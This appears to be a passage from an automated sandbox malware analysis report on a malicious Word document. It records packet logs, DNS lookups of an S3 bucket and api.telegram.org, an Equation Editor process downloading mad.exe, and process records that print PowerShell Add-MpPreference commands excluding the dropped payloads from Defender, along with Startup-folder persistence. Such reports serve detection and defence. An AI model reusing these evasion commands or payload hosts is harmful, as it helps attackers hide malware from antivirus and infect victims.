                                                  May 4, 2021 20:31:12.871987104 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.871990919 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.871999979 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.872008085 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.872025013 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.872030020 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.872050047 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.872051001 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.872060061 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.872075081 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.872090101 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.872097015 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.872109890 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.872118950 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.872131109 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.872144938 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.872154951 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.872167110 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.872184992 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.872188091 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.872194052 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.872209072 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.872226000 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.872231007 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.872239113 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.872251034 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.872267962 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.872271061 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.872281075 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.872292042 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.872311115 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.872318029 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.872319937 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.872339964 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.872359991 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.872361898 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.872374058 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.872380972 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.872390032 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.872400999 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.872416973 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.872421026 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.872430086 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.872442961 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.872456074 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.872462988 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.872468948 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.872488976 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.872500896 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.872512102 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.872530937 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.872541904 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.872548103 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.872551918 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.872559071 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.872572899 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.872589111 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.872592926 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.872601032 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.872612953 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.872629881 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.872632980 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.872642994 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.872658968 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.872668028 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.872680902 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.872698069 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.872700930 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.872709036 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.872721910 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.872735977 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.872742891 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.872745991 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.872761965 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.872778893 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.872782946 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.872790098 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.872803926 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.872819901 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.872828007 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.872832060 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.872849941 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.872863054 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.872869968 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.872875929 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.872889996 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.872906923 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.872910976 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.872920036 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.872931004 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.872950077 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.872951031 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.872960091 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.872971058 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.872986078 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.873002052 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.873019934 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.873023987 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.873044014 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.873053074 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.873060942 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.873064995 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.873085022 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.873090982 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.873101950 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.873105049 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.873112917 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.873126030 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.873146057 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.873147011 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.873162031 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.873171091 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.873183012 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.873195887 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.873212099 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.873215914 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.873219013 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.873253107 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.873261929 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.873277903 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.873294115 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.873301983 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.873311043 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.873326063 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.873339891 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.873349905 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.873368025 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.873383045 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.873379946 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.873436928 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.873442888 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.873465061 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.873490095 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.873490095 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.873498917 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.873513937 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.873527050 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.873538971 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.873553038 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.873568058 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.873594046 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.873613119 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.873619080 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.873620987 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.873625994 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.873642921 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.873653889 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.873667955 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.873670101 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.873692989 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.873707056 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.873723984 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.873723984 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.873752117 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.873766899 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.873775959 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.873779058 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.873795033 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.873800993 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.873815060 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.873827934 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.873837948 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.873852015 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.873867035 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.873877048 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.873898983 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.873900890 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.873917103 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.873933077 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.873941898 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.873960972 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.873980045 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.873986006 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.873995066 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.874011040 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.874023914 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.874037027 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.874053955 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.874061108 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.874067068 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.874097109 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.877661943 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.877701998 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.877728939 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.877768040 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.877804995 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.877810001 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.896363020 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.897079945 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.968400955 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.968435049 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.968456030 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.968475103 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.968497992 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.968625069 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.968682051 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.969929934 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.969952106 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.970062971 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.977516890 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.977552891 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.977667093 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.988003969 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.988053083 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.988095045 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.988192081 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.988219976 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.990283012 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.990317106 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.990349054 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.990380049 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.990381002 CEST804916752.218.240.113192.168.2.22

                                                  UDP Packets

                                                  Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                  May 4, 2021 20:31:09.510771036 CEST | 52197 | 53 | 192.168.2.22 | 8.8.8.8
                                                  May 4, 2021 20:31:09.571837902 CEST | 53 | 52197 | 8.8.8.8 | 192.168.2.22
                                                  May 4, 2021 20:31:09.572257996 CEST | 52197 | 53 | 192.168.2.22 | 8.8.8.8
                                                  May 4, 2021 20:31:09.630546093 CEST | 53 | 52197 | 8.8.8.8 | 192.168.2.22
                                                  May 4, 2021 20:33:21.528346062 CEST | 53099 | 53 | 192.168.2.22 | 8.8.8.8
                                                  May 4, 2021 20:33:21.577101946 CEST | 53 | 53099 | 8.8.8.8 | 192.168.2.22

                                                  DNS Queries

                                                  Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
                                                  May 4, 2021 20:31:09.510771036 CEST | 192.168.2.22 | 8.8.8.8 | 0x2c09 | Standard query (0) | miolouno.s3-us-west-2.amazonaws.com | A (IP address) | IN (0x0001)
                                                  May 4, 2021 20:31:09.572257996 CEST | 192.168.2.22 | 8.8.8.8 | 0x2c09 | Standard query (0) | miolouno.s3-us-west-2.amazonaws.com | A (IP address) | IN (0x0001)
                                                  May 4, 2021 20:33:21.528346062 CEST | 192.168.2.22 | 8.8.8.8 | 0xc6c2 | Standard query (0) | api.telegram.org | A (IP address) | IN (0x0001)

                                                  DNS Answers

                                                  Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                                                  May 4, 2021 20:31:09.571837902 CEST | 8.8.8.8 | 192.168.2.22 | 0x2c09 | No error (0) | miolouno.s3-us-west-2.amazonaws.com | s3-us-west-2-r-w.amazonaws.com | | CNAME (Canonical name) | IN (0x0001)
                                                  May 4, 2021 20:31:09.571837902 CEST | 8.8.8.8 | 192.168.2.22 | 0x2c09 | No error (0) | s3-us-west-2-r-w.amazonaws.com | | 52.218.240.113 | A (IP address) | IN (0x0001)
                                                  May 4, 2021 20:31:09.630546093 CEST | 8.8.8.8 | 192.168.2.22 | 0x2c09 | No error (0) | miolouno.s3-us-west-2.amazonaws.com | s3-us-west-2-r-w.amazonaws.com | | CNAME (Canonical name) | IN (0x0001)
                                                  May 4, 2021 20:31:09.630546093 CEST | 8.8.8.8 | 192.168.2.22 | 0x2c09 | No error (0) | s3-us-west-2-r-w.amazonaws.com | | 52.218.240.113 | A (IP address) | IN (0x0001)
                                                  May 4, 2021 20:33:21.577101946 CEST | 8.8.8.8 | 192.168.2.22 | 0xc6c2 | No error (0) | api.telegram.org | | 149.154.167.220 | A (IP address) | IN (0x0001)

                                                  HTTP Request Dependency Graph

                                                  • miolouno.s3-us-west-2.amazonaws.com

                                                  HTTP Packets

                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                  0 | 192.168.2.22 | 49167 | 52.218.240.113 | 80 | C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

                                                  Timestamp | kBytes transferred | Direction | Data
                                                  May 4, 2021 20:31:09.848525047 CEST | 1 | OUT | GET /mad.exe HTTP/1.1
                                                  Accept: */*
                                                  Accept-Encoding: gzip, deflate
                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                  Host: miolouno.s3-us-west-2.amazonaws.com
                                                  Connection: Keep-Alive
                                                  May 4, 2021 20:31:10.101667881 CEST | 1 | IN | HTTP/1.1 200 OK
                                                  x-amz-id-2: DS7QrdmdJpyib1F1w8LPzDqd7RTzrfjUtXZKXhrpOuBqbV8xuHGgC7n/1gKtnvkdl880SC70WW0=
                                                  x-amz-request-id: S238G7R11599EGD7
                                                  Date: Tue, 04 May 2021 18:31:10 GMT
                                                  Last-Modified: Tue, 04 May 2021 10:51:11 GMT
                                                  ETag: "d96f52fc8733d2f4a127bdc44d4ceb25"
                                                  x-amz-version-id: IAoppdQmXchpR2n3EPNrNxP0ggf842rd
                                                  Accept-Ranges: bytes
                                                  Content-Type: application/x-msdownload
                                                  Content-Length: 3367424
                                                  Server: AmazonS3

                                                  System Behavior

                                                  General

                                                  Start time:20:30:37
                                                  Start date:04/05/2021
                                                  Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                  Wow64 process (32bit):false
                                                  Commandline:'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
                                                  Imagebase:0x13f520000
                                                  File size:1424032 bytes
                                                  MD5 hash:95C38D04597050285A18F66039EDB456
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high

                                                  General

                                                  Start time:20:30:38
                                                  Start date:04/05/2021
                                                  Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                  Wow64 process (32bit):true
                                                  Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                                                  Imagebase:0x400000
                                                  File size:543304 bytes
                                                  MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high

                                                  General

                                                  Start time:20:30:43
                                                  Start date:04/05/2021
                                                  Path:C:\Users\user\AppData\Roaming\CTF loader_es.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Users\user\AppData\Roaming\CTF loader_es.exe
                                                  Imagebase:0x2e0000
                                                  File size:3367424 bytes
                                                  MD5 hash:D96F52FC8733D2F4A127BDC44D4CEB25
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:.Net C# or VB.NET
                                                  Antivirus matches:
                                                  • Detection: 100%, Joe Sandbox ML
                                                  • Detection: 41%, Virustotal
                                                  • Detection: 19%, Metadefender
                                                  • Detection: 45%, ReversingLabs
                                                  Reputation:low

                                                  General

                                                  Start time:20:30:49
                                                  Start date:04/05/2021
                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\CTF loader_es.exe' -Force
                                                  Imagebase:0x21e00000
                                                  File size:452608 bytes
                                                  MD5 hash:92F44E405DB16AC55D97E3BFE3B132FA
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:.Net C# or VB.NET
                                                  Reputation:high

                                                  General

                                                  Start time:20:30:50
                                                  Start date:04/05/2021
                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe' -Force
                                                  Imagebase:0x21e00000
                                                  File size:452608 bytes
                                                  MD5 hash:92F44E405DB16AC55D97E3BFE3B132FA
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:.Net C# or VB.NET
                                                  Reputation:high

                                                  General

                                                  Start time:20:30:51
                                                  Start date:04/05/2021
                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe' -Force
                                                  Imagebase:0x21e00000
                                                  File size:452608 bytes
                                                  MD5 hash:92F44E405DB16AC55D97E3BFE3B132FA
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:.Net C# or VB.NET
                                                  Reputation:high

                                                  General

                                                  Start time:20:30:51
                                                  Start date:04/05/2021
                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\CTF loader_es.exe' -Force
                                                  Imagebase:0x21e00000
                                                  File size:452608 bytes
                                                  MD5 hash:92F44E405DB16AC55D97E3BFE3B132FA
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:.Net C# or VB.NET
                                                  Reputation:high

                                                  General

                                                  Start time:20:30:56
                                                  Start date:04/05/2021
                                                  Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe'
                                                  Imagebase:0x10b0000
                                                  File size:3367424 bytes
                                                  MD5 hash:D96F52FC8733D2F4A127BDC44D4CEB25
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:.Net C# or VB.NET
                                                  Antivirus matches:
                                                  • Detection: 100%, Joe Sandbox ML
                                                  • Detection: 41%, Virustotal
                                                  • Detection: 19%, Metadefender
                                                  • Detection: 45%, ReversingLabs
                                                  Reputation:low

                                                  General

                                                  Start time:20:30:57
                                                  Start date:04/05/2021
                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe' -Force
                                                  Imagebase:0x21e00000
                                                  File size:452608 bytes
                                                  MD5 hash:92F44E405DB16AC55D97E3BFE3B132FA
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:.Net C# or VB.NET
                                                  Reputation:high

                                                  General

                                                  Start time:20:30:57
                                                  Start date:04/05/2021
                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\CTF loader_es.exe' -Force
                                                  Imagebase:0x21e00000
                                                  File size:452608 bytes
                                                  MD5 hash:92F44E405DB16AC55D97E3BFE3B132FA
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:.Net C# or VB.NET
                                                  Reputation:high

                                                  General

                                                  Start time:20:30:58
                                                  Start date:04/05/2021
                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe' -Force
                                                  Imagebase:0x21e00000
                                                  File size:452608 bytes
                                                  MD5 hash:92F44E405DB16AC55D97E3BFE3B132FA
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:.Net C# or VB.NET
                                                  Reputation:high

                                                  General

                                                  Start time:20:31:00
                                                  Start date:04/05/2021
                                                  Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe
                                                  Wow64 process (32bit):true
